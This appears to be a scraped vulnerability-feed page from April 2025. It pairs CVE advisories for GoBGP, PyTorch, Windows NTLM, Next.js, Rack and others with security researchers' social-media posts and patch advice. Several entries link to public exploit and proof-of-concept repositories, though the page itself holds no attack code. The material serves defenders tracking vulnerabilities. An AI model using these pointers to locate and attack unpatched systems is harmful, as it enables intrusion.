Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) 0xdeadc0de.xyz/blog/cve-2025-1

##

CVE-2025-43972
(6.8 MEDIUM)

EPSS: 0.06%

updated 2025-04-21T21:55:34

1 posts

An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in the pkg/packet/bgp/bgp.go flowspec parser by sending fewer than 20 bytes in a certain context.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43971
(8.6 HIGH)

EPSS: 0.04%

updated 2025-04-21T21:55:26

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows attackers to cause a panic via a zero value for softwareVersionLen.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43970
(4.3 MEDIUM)

EPSS: 0.02%

updated 2025-04-21T21:55:19

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not properly check the input length, e.g., by ensuring that there are 12 bytes or 36 bytes (depending on the address family).

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32408
(2.5 LOW)

EPSS: 0.01%

updated 2025-04-21T17:15:24.117000

1 posts

In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is mishandled.

cR0w@infosec.exchange at 2025-04-21T13:35:02.000Z ##

Preauth code exec in an IAM platform sounds fun.

bookstack.soffid.com/books/sec

sev:HIGH 8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

In Soffid Console 3.5.38 before 3.5.39, necessary checks were not applied to some Java objects. A malicious agent could possibly execute arbitrary code in the Sync Server and compromise security.

cvedetails.com/cve/CVE-2025-32

##

CVE-2025-43916
(3.4 LOW)

EPSS: 0.03%

updated 2025-04-21T14:23:45.950000

1 posts

Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

cR0w@infosec.exchange at 2025-04-21T15:48:44.000Z ##

This is an interesting vuln in Sonos API.

github.com/larlarua/vulnerabil

sev:LOW 3.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N

Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

nvd.nist.gov/vuln/detail/CVE-2

What's interesting to me is in the description:

This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

A quick search for that string only returned this CVE so I don't know if it's a pending CVE or what but it might be worth watching for if you play around with Sonos things.

##

CVE-2025-43973
(6.8 MEDIUM)

EPSS: 0.04%

updated 2025-04-21T14:23:45.950000

1 posts

An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not verify that the input length corresponds to a situation in which all bytes are available for an RTR message.

cR0w@infosec.exchange at 2025-04-21T01:51:04.000Z ##

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43918
(6.4 MEDIUM)

EPSS: 0.01%

updated 2025-04-20T00:31:48

1 posts

SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.

cR0w@infosec.exchange at 2025-04-19T22:43:54.000Z ##

CVE published for that ssl dot com oopsie.

bugzilla.mozilla.org/show_bug.

SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3803
(8.8 HIGH)

EPSS: 0.05%

updated 2025-04-19T15:30:28

1 posts

A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It has been rated as critical. This issue affects the function cgiSysScheduleRebootSet of the file /bin/httpd. The manipulation of the argument rebootDate leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-3802
(8.8 HIGH)

EPSS: 0.05%

updated 2025-04-19T15:30:23

1 posts

A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It has been declared as critical. This vulnerability affects the function cgiPingSet of the file /bin/httpd. The manipulation of the argument pingIP leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CVE-2025-32434(CVSS UNKNOWN)

EPSS: 0.41%

updated 2025-04-18T18:34:25

2 posts

# Description I found a Remote Command Execution (RCE) vulnerability in the PyTorch. When load model using torch.load with weights_only=True, it can still achieve RCE. # Background knowledge https://github.com/pytorch/pytorch/security As you can see, the PyTorch official documentation considers using `torch.load()` with `weights_only=True` to be safe. ![image](https://github.com/user-attachme

beyondmachines1@infosec.exchange at 2025-04-23T11:01:07.000Z ##

Critical remote code execution flaw reported in PyTorch Framework

The PyTorch machine learning framework contains a critical Remote Code Execution vulnerability (CVE-2025-32434, CVSS 9.3) affecting versions up to 2.5.1, which allows attackers to bypass the `weights_only=True` protection parameter when loading models, potentially executing arbitrary code.

**If you are using PyTorch, especially for loading third party potentially unsafe models, update your PyTorch to the latest version. Alternatively, find other ways to load models because weights_only=True parameter in the torch.load() is not safe now.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

jos1264@social.skynetcloud.site at 2025-04-21T10:45:02.000Z ##

Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found thecyberexpress.com/pytorch-vu #PyTorchVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202532434 #MLsecurity #CyberNews #AImodels

##

CVE-2025-42599
(9.8 CRITICAL)

EPSS: 0.30%

updated 2025-04-18T15:31:44

2 posts

Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffer overflow vulnerability. Receiving a specially crafted request created and sent by a remote unauthenticated attacker may lead to arbitrary code execution and/or a denial-of-service (DoS) condition.

securityland@mastodon.social at 2025-04-25T19:19:32.000Z ##

Urgent security alert for Active! mail users! A critical vulnerability (CVE-2025-42599) was exploited in zero-day attacks for over 8 months. Find out if you're affected and what steps to take now. Don't wait!

#SecurityLand #BreachBreakdown #ActiveMail #Security #ZeroDay #Cybersecurity #Vulnerability

security.land/critical-active-

##

beyondmachines1@infosec.exchange at 2025-04-23T09:01:06.000Z ##

Active! Mail remote code execution flaw actively exploited

Japanese web-based email client Active! Mail contains a critical stack-based buffer overflow vulnerability (CVE-2025-42599, CVSS 9.8) that allows unauthenticated attackers to execute arbitrary code remotely. The flaw is currently being actively exploited against Japanese organizations impacting approximately 11 million accounts, prompting Qualitia to release version 6.60.06008562 as an urgent security patch.

**If you are running Active! Mail webmail based service, disable it immediately and start patching. Because hackers are actively attacking it. You can try to mitigate the issue by blocking multipart/form-data headers, but that's not really a fix. Better to disable it fully, patch, then reactivate the service.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

CVE-2025-24054
(6.5 MEDIUM)

EPSS: 17.54%

updated 2025-04-18T14:15:17.677000

4 posts

External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.

3 repos

https://github.com/helidem/CVE-2025-24054-PoC

https://github.com/xigney/CVE-2025-24054_PoC

https://github.com/Marcejr117/CVE-2025-24071_PoC

benzogaga33@mamot.fr at 2025-04-22T09:40:03.000Z ##

Windows – CVE-2025-24054 : cet exploit NTLM est utilisé pour cibler entreprises et gouvernements it-connect.fr/windows-cve-2025 #ActuCybersécurité #Cybersécurité #Phishing #Windows #NTLM

##

TomSellers@infosec.exchange at 2025-04-21T16:44:45.000Z ##

There is quite a bit of buzz related to CVE-2025-24054 which covers attackers causing victims to leak NTLM hashes if they open certain files or view certain directories. In short, this forces victims running Windows to make a connection to an attacker controlled SMB share.

Note: A patch was provided by Microsoft on March 11.

If you prevent SMB traffic from leaving your networks then you don't have to worry about this unless the attacker has already setup shop in your network. Like, patch anyway but, IMO, it would be a better use of your time to ensure that outbound SMB is blocked first. Don't forget to account for mobile devices that are off-network.

Reference:
Check Point - CVE-2025-24054, NTLM Exploit in the Wild
research.checkpoint.com/2025/c

#Security #Windows

##

0x40k@infosec.exchange at 2025-04-21T14:13:45.000Z ##

Man, what a week! 😅 Those supposedly "harmless" clicks... seriously, sometimes it's enough to make you wanna weep.

Sure, the big, flashy exploits grab the headlines. But honestly? More often than not, it's a simple dodgy config or a user clicking way too fast that really opens the door.

Working as a pentester, I see this play out constantly: those little slip-ups are frequently the most dangerous ones. It’s why you *definitely* need to keep CVE-2025-24054 on your radar and get it patched ASAP!

And folks, seriously – *never* blindly run random Python code someone just emails you out of the blue! (Yeah, we see you, potential state-sponsored actors 😉).

What about you? Got any war stories about these seemingly "small" attack vectors? Let's hear 'em! Share your experiences below. 👇

#Cybersecurity #Pentesting #OffensiveSecurity

##

Bmwalt@infosec.exchange at 2025-04-19T23:21:26.000Z ##

Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.

This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.

The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.

What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.

Full breakdown from Check Point here:
research.checkpoint.com/2025/c

#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow

##

CVE-2025-2567
(9.8 CRITICAL)

EPSS: 0.05%

updated 2025-04-15T21:31:48

1 posts

An attacker could modify or disable settings, disrupt fuel monitoring and supply chain operations, leading to disabling of ATG monitoring. This would result in potential safety hazards in fuel storage and transportation.

beyondmachines1@infosec.exchange at 2025-04-23T12:01:07.000Z ##

Critical authentication flaw reported in Lantronix Xport

The Lantronix Xport devices contain a critical authentication bypass vulnerability (CVE-2025-2567, CVSS 9.8) affecting versions 6.5.0.7 through 7.0.0.3 that allows remote attackers to access the configuration interface without credentials, potentially enabling disruption of critical infrastructure and creating safety hazards in fuel operations.

**If you are using Lantronix Xport devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-3587
(6.3 MEDIUM)

EPSS: 0.04%

updated 2025-04-15T18:39:27.967000

1 posts

A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

cR0w@infosec.exchange at 2025-04-21T16:16:32.000Z ##

Infinite loop DoS in Amazon dot IonDotnet.

aws.amazon.com/security/securi

sev:MED 5.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-33028
(6.1 MEDIUM)

EPSS: 0.04%

updated 2025-04-15T18:31:58

1 posts

In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because of an incomplete fix for CVE-2024-8811. This vulnerability allows attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists

bontchev@infosec.exchange at 2025-04-24T06:19:16.000Z ##

Lulz. Remember the brouhaha about the "vulnerability" in WinRAR for not preserving the Mark-of-the-Web when extracting files from downloaded archives? Well, guess what WinZIP does.

"CVE-2025-33028 - WinZip Mark-of-the-Web Bypass Vulnerability":

github.com/EnisAksu/Argonis/bl

##

CVE-2025-2636
(9.8 CRITICAL)

EPSS: 0.25%

updated 2025-04-11T15:39:52.920000

1 posts

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.1.0.85 via the 'instawp-database-manager' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access

beyondmachines1@infosec.exchange at 2025-04-22T18:01:07.000Z ##

Critical flaw reported in InstaWP Connect WordPress plugin
The InstaWP Connect WordPress plugin contains a critical Local File Inclusion vulnerability (CVE-2025-2636, CVSS 9.8) in versions up to 0.1.0.85 that allows unauthenticated attackers to execute arbitrary PHP files, potentially leading to complete website compromise. Administrators should update to version 0.1.0.86 or later.

**If you have installed InstaWP Connect WordPress plugin, update it NOW. The update is trivial, and it's much easier to update a plugin and sleep easy than to worry whether you can be hacked.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-0120
(0 None)

EPSS: 0.02%

updated 2025-04-11T15:39:52.920000

1 posts

A vulnerability with a privilege management mechanism in the Palo Alto Networks GlobalProtect™ app on Windows devices allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY\SYSTEM. However, execution requires that the local user can also successfully exploit a race condition, which makes this vulnerability difficult to exploit.

AAKL@infosec.exchange at 2025-04-22T16:27:55.000Z ##

Palo Alto updated this vulnerability yesterday.

CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (moderate) security.paloaltonetworks.com/ #PaloAlto #cybersecurity #infosec

##

CVE-2025-3248
(9.8 CRITICAL)

EPSS: 80.91%

updated 2025-04-10T01:59:49

2 posts

Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/v1/validate/code` endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.

Nuclei template

4 repos

https://github.com/peiqiF4ck/WebFrameworkTools-5.1-main

https://github.com/verylazytech/CVE-2025-3248

https://github.com/PuddinCat/CVE-2025-3248-POC

https://github.com/xuemian168/CVE-2025-3248

CVE-2025-21204
(7.8 HIGH)

EPSS: 0.07%

updated 2025-04-08T18:34:49

4 posts

Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.

AAKL@infosec.exchange at 2025-04-23T16:13:12.000Z ##

Glad we got this out of the way.

PC World: Windows 11’s crucial new ‘inetpub’ folder, created to patch CVE-2025-21204, is laughably easy to hack pcworld.com/article/2761626/wi @pcworld #cybersecurity #infosec #Microsoft #Windows

##

mimir@meow.social at 2025-04-22T20:20:25.000Z ##

@GossiTheDog Are you sure the writeup for CVE-2025-21204 you linked is good? It seems superficially reasonable but looks very confusing on closer inspection, in a way that suggests it may be AI-generated.

But I'm not that confident in our assessment here, and will probably trust your judgement if you say it looks reasonable - we don't do too much Windows stuff

##

mttaggart@infosec.exchange at 2025-04-22T15:31:17.000Z ##

My recent linking a CVE-2025-21204 PoC is in fact BS. Deeper inspection of the PoC demonstrated no connection between the code and C:\inetpub, and what's more, the "evidence" didn't show privilege escalation.

I had concerns this was LLM crap, and I should have trusted those instincts.

##

GossiTheDog@cyberplace.social at 2025-04-22T14:23:12.000Z ##

I've written about how Microsoft's fix for a symlink vulnerability introduces another symlink vulnerability, where all users (including non-admins) can stop all future Windows OS security patches doublepulsar.com/microsofts-pa

##

CVE-2024-48887
(9.8 CRITICAL)

EPSS: 0.09%

updated 2025-04-08T18:34:48

1 posts

A unverified password change vulnerability in Fortinet FortiSwitch GUI may allow a remote unauthenticated attacker to change admin passwords via a specially crafted request

2 repos

https://github.com/groshi215/CVE-2024-48887-Exploit

https://github.com/cybersecplayground/CVE-2024-48887-FortiSwitch-Exploit

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2025-29927
(9.1 CRITICAL)

EPSS: 92.56%

updated 2025-03-28T15:32:59

1 posts

# Impact It is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. # Patches * For Next.js 15.x, this issue is fixed in `15.2.3` * For Next.js 14.x, this issue is fixed in `14.2.25` * For Next.js 13.x, this issue is fixed in `13.5.9` * For Next.js 12.x, this issue is fixed in `12.3.5` * For Next.js 11.x, consult the below workarou

Nuclei template

81 repos

https://github.com/lediusa/CVE-2025-29927

https://github.com/jmbowes/NextSecureScan

https://github.com/Neoxs/nextjs-middleware-vuln-poc

https://github.com/goncalocsousa1/CVE-2025-29927

https://github.com/fahimalshihab/NextBypass

https://github.com/t3tra-dev/cve-2025-29927-demo

https://github.com/0x0Luk/0xMiddleware

https://github.com/pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-

https://github.com/Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927

https://github.com/Oyst3r1ng/CVE-2025-29927

https://github.com/aydinnyunus/CVE-2025-29927

https://github.com/nocomp/CVE-2025-29927-scanner

https://github.com/furmak331/CVE-2025-29927

https://github.com/nyctophile0969/CVE-2025-29927

https://github.com/kuzushiki/CVE-2025-29927-test

https://github.com/m2hcz/m2hcz-Next.js-security-flaw-CVE-2025-29927---PoC-exploit

https://github.com/gotr00t0day/CVE-2025-29927

https://github.com/RoyCampos/CVE-2025-29927

https://github.com/sn1p3rt3s7/NextJS_CVE-2025-29927

https://github.com/pickovven/vulnerable-nextjs-14-CVE-2025-29927

https://github.com/kOaDT/poc-cve-2025-29927

https://github.com/lem0n817/CVE-2025-29927

https://github.com/yuzu-juice/CVE-2025-29927_demo

https://github.com/darklotuskdb/nextjs-CVE-2025-29927-hunter

https://github.com/enochgitgamefied/NextJS-CVE-2025-29927

https://github.com/iSee857/CVE-2025-29927

https://github.com/ayato-shitomi/WebLab_CVE-2025-29927

https://github.com/ticofookfook/poc-nextjs-CVE-2025-29927

https://github.com/ethanol1310/POC-CVE-2025-29927-

https://github.com/w2hcorp/CVE-2025-29927-PoC

https://github.com/nicknisi/next-attack

https://github.com/UNICORDev/exploit-CVE-2025-29927

https://github.com/c0dejump/CVE-2025-29927-check

https://github.com/AnonKryptiQuz/NextSploit

https://github.com/Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation

https://github.com/aleongx/CVE-2025-29927

https://github.com/Slvignesh05/CVE-2025-29927

https://github.com/yugo-eliatrope/test-cve-2025-29927

https://github.com/azu/nextjs-cve-2025-29927-poc

https://github.com/ThemeHackers/CVE-2025-29972

https://github.com/Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927

https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927

https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule

https://github.com/EQSTLab/CVE-2025-29927

https://github.com/alihussainzada/CVE-2025-29927-PoC

https://github.com/0xcucumbersalad/cve-2025-29927

https://github.com/alastair66/CVE-2025-29927

https://github.com/ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927

https://github.com/Heimd411/CVE-2025-29927-PoC

https://github.com/MuhammadWaseem29/CVE-2025-29927-POC

https://github.com/fourcube/nextjs-middleware-bypass-demo

https://github.com/dante01yoon/CVE-2025-29927

https://github.com/mhamzakhattak/CVE-2025-29927

https://github.com/Eve-SatOrU/POC-CVE-2025-29927

https://github.com/BilalGns/CVE-2025-29927

https://github.com/Gokul-Krishnan-V-R/cve-2025-29927

https://github.com/Ademking/CVE-2025-29927

https://github.com/0xPThree/next.js_cve-2025-29927

https://github.com/6mile/nextjs-CVE-2025-29927

https://github.com/pixilated730/NextJS-Exploit-

https://github.com/maronnjapan/claude-create-CVE-2025-29927

https://github.com/TheresAFewConors/CVE-2025-29927-Testing

https://github.com/websecnl/CVE-2025-29927-PoC-Exploit

https://github.com/Nekicj/CVE-2025-29927-exploit

https://github.com/arvion-agent/next-CVE-2025-29927

https://github.com/jeymo092/cve-2025-29927

https://github.com/Grand-Moomin/Vuln-Next.js-CVE-2025-29927

https://github.com/strobes-security/nextjs-vulnerable-app

https://github.com/serhalp/test-cve-2025-29927

https://github.com/YEONDG/nextjs-cve-2025-29927

https://github.com/l1uk/nextjs-middleware-exploit

https://github.com/Jull3Hax0r/next.js-exploit

https://github.com/0xWhoknows/CVE-2025-29927

https://github.com/Balajih4kr/cve-2025-29927

https://github.com/aleongx/CVE-2025-29927_Scanner

https://github.com/kh4sh3i/CVE-2025-29927

https://github.com/takumade/ghost-route

https://github.com/narasimhauppala/nextjs-middleware-bypass

https://github.com/ValGrace/middleware-auth-bypass

https://github.com/0xPb1/Next.js-CVE-2025-29927

https://github.com/ricsirigu/CVE-2025-29927

SoLSec@mastodon.social at 2025-04-22T21:02:14.000Z ##

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) kitploit.com/2025/04/ghost-rou

##

CVE-2024-54085(CVSS UNKNOWN)

EPSS: 0.11%

updated 2025-03-28T15:32:58

1 posts

AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.

oversecurity@mastodon.social at 2025-04-23T15:10:39.000Z ##

ASUS releases fix for AMI bug that lets hackers brick servers

ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick...

🔗️ [Bleepingcomputer] link.is.it/ky8mNl

##

CVE-2025-27840
(6.8 MEDIUM)

EPSS: 0.07%

updated 2025-03-11T18:32:12

1 posts

Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory).

3 repos

https://github.com/demining/Bluetooth-Attacks-CVE-2025-27840

https://github.com/em0gi/CVE-2025-27840

https://github.com/ladyg00se/CVE-2025-27840-WIP

CVE-2025-27610
(7.5 HIGH)

EPSS: 0.09%

updated 2025-03-10T23:15:35.073000

6 posts

Rack provides an interface for developing web applications in Ruby. Prior to versions 2.2.13, 3.0.14, and 3.1.12, `Rack::Static` can serve files under the specified `root:` even if `urls:` are provided, which may expose other files under the specified `root:` unexpectedly. The vulnerability occurs because `Rack::Static` does not properly sanitize user-supplied paths before serving files. Specifica

Sempf at 2025-04-26T04:01:08.061Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

Sempf@infosec.exchange at 2025-04-26T04:01:08.000Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

#ruby #cve

##

AAKL@infosec.exchange at 2025-04-25T14:06:31.000Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews #cybersecurity #Infosec #Ruby

##

jos1264@social.skynetcloud.site at 2025-04-25T10:30:03.000Z ##

Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) helpnetsecurity.com/2025/04/25 #webapplicationsecurity #securityupdate #vulnerability #Don'tmiss #Hotstuff #OPSWAT #News #Ruby

##

0x40k@infosec.exchange at 2025-04-25T10:18:45.000Z ##

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

##

CVE-2025-0725
(7.3 HIGH)

EPSS: 0.21%

updated 2025-03-07T03:31:33

1 posts

When libcurl is asked to perform automatic gzip decompression of content-encoded HTTP responses with the `CURLOPT_ACCEPT_ENCODING` option, **using zlib 1.2.0.3 or older**, an attacker-controlled integer overflow would make libcurl perform a buffer overflow.

bagder@mastodon.social at 2025-04-23T22:04:19.000Z ##

Updated #curl bug bounty stats, six years in:

520 reports
78 confirmed security vulnerabilities
104 "informative" reports, bugs that weren't vulnerabilities
11 marked as "AI slop"

The rest were just different kinds of not applicable. Some more crazy than others.

The latest confirmed curl vulnerability (CVE-2025-0725) was reported 90 days ago.

There is currently zero issues in our queue.

curl.se/docs/bugbounty.html

##

CVE-2025-27111
(0 None)

EPSS: 0.12%

updated 2025-03-04T16:15:40.487000

4 posts

Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs unsanitised header values from the X-Sendfile-Type header. An attacker can exploit this by injecting escape sequences (such as newline characters) into the header, resulting in log injection. This vulnerability is fixed in 2.2.12, 3.0.13, and 3.1.11.

Sempf at 2025-04-26T04:01:08.061Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

##

AAKL at 2025-04-25T14:06:31.143Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews

##

Sempf@infosec.exchange at 2025-04-26T04:01:08.000Z ##

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

opswat.com/blog/security-analy

#ruby #cve

##

AAKL@infosec.exchange at 2025-04-25T14:06:31.000Z ##

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 opswat.com/blog/security-analy

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers thehackernews.com/2025/04/rese @thehackernews #cybersecurity #Infosec #Ruby

##

CVE-2022-42475
(9.8 CRITICAL)

EPSS: 93.18%

updated 2025-02-24T18:32:12

1 posts

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

7 repos

https://github.com/AiK1d/CVE-2022-42475-RCE-POC

https://github.com/bryanster/ioc-cve-2022-42475

https://github.com/scrt/cve-2022-42475

https://github.com/Mustafa1986/cve-2022-42475-Fortinet

https://github.com/0xhaggis/CVE-2022-42475

https://github.com/Amir-hy/cve-2022-42475

https://github.com/natceil/cve-2022-42475

AAKL@infosec.exchange at 2025-04-21T15:17:09.000Z ##

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit cyble.com/blog/it-vulnerabilit #cybersecurity #infosec #Fortinet

##

CVE-2025-25184
(0 None)

EPSS: 0.10%

updated 2025-02-14T20:15:34.350000

4 posts

Rack provides an interface for developing web applications in Ruby. Prior to versions 2.2.11, 3.0.12, and 3.1.10, Rack::CommonLogger can be exploited by crafting input that includes newline characters to manipulate log entries. The supplied proof-of-concept demonstrates injecting malicious content into logs. When a user provides the authorization credentials via Rack::Auth::Basic, if success, the

Sempf at 2025-04-26T04:01:08.061Z ##

